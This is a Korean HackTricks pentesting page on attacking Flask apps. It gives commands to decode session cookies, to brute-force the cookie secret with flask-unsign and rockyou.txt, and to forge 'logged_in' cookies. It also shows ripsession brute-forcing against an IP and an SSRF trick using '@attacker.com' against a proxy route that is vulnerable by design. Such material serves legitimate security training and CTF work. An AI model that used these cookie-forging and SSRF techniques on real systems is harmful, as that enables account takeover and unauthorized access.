Flask

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

• 구독 계획 확인하기!
• **💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
• HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.

아마도 CTF를 진행하고 있다면 Flask 애플리케이션은 SSTI와 관련이 있을 것입니다.

Cookies

기본 쿠키 세션 이름은 **session**입니다.

Decoder

온라인 Flask 쿠키 디코더: https://www.kirsle.net/wizards/flask-session.cgi

Manual

쿠키의 첫 번째 부분을 첫 번째 점까지 가져와서 Base64로 디코드합니다.

echo "ImhlbGxvIg" | base64 -d

쿠키는 비밀번호를 사용하여 서명됩니다.

Flask-Unsign

Flask 애플리케이션의 세션 쿠키를 가져오고, 디코드하고, 무차별 대입 공격을 수행하며, 비밀 키를 추측하여 제작하는 명령줄 도구입니다.

Client Challenge

pip3 install flask-unsign

쿠키 디코드

flask-unsign --decode --cookie 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.XDuWxQ.E2Pyb6x3w-NODuflHoGnZOEpbH8'

브루트 포스

flask-unsign --wordlist /usr/share/wordlists/rockyou.txt --unsign --cookie '<cookie>' --no-literal-eval

서명

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME'

레거시(구버전) 사용하여 서명하기

flask-unsign --sign --cookie "{'logged_in': True}" --secret 'CHANGEME' --legacy

RIPsession

쿠키를 사용하여 웹사이트를 무차별 대입 공격하는 명령줄 도구로, flask-unsign으로 제작되었습니다.

GitHub - Tagvi/ripsession: A command line tool to brute-force websites using cookies crafted with flask-unsign.

ripsession -u 10.10.11.100 -c "{'logged_in': True, 'username': 'changeMe'}" -s password123 -f "user doesn't exist" -w wordlist.txt

Flask 세션 쿠키에서 SQLi와 SQLmap

이 예제에서는 sqlmap eval 옵션을 사용하여 Flask에 대한 sqlmap 페이로드를 자동으로 서명하는 방법을 보여줍니다.

SSRF를 위한 Flask 프록시

이 글에서는 Flask가 “@” 문자로 시작하는 요청을 허용하는 방법을 설명합니다.

GET @/ HTTP/1.1
Host: target.com
Connection: close

다음 시나리오에서:

from flask import Flask
from requests import get

app = Flask('__main__')
SITE_NAME = 'https://google.com/'

@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def proxy(path):
return get(f'{SITE_NAME}{path}').content

app.run(host='0.0.0.0', port=8080)

“@attacker.com“과 같은 것을 도입할 수 있어 SSRF를 유발할 수 있습니다.

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

• 구독 계획 확인하기!
• **💬 디스코드 그룹 또는 텔레그램 그룹에 참여하거나 트위터 🐦 @hacktricks_live를 팔로우하세요.
• HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.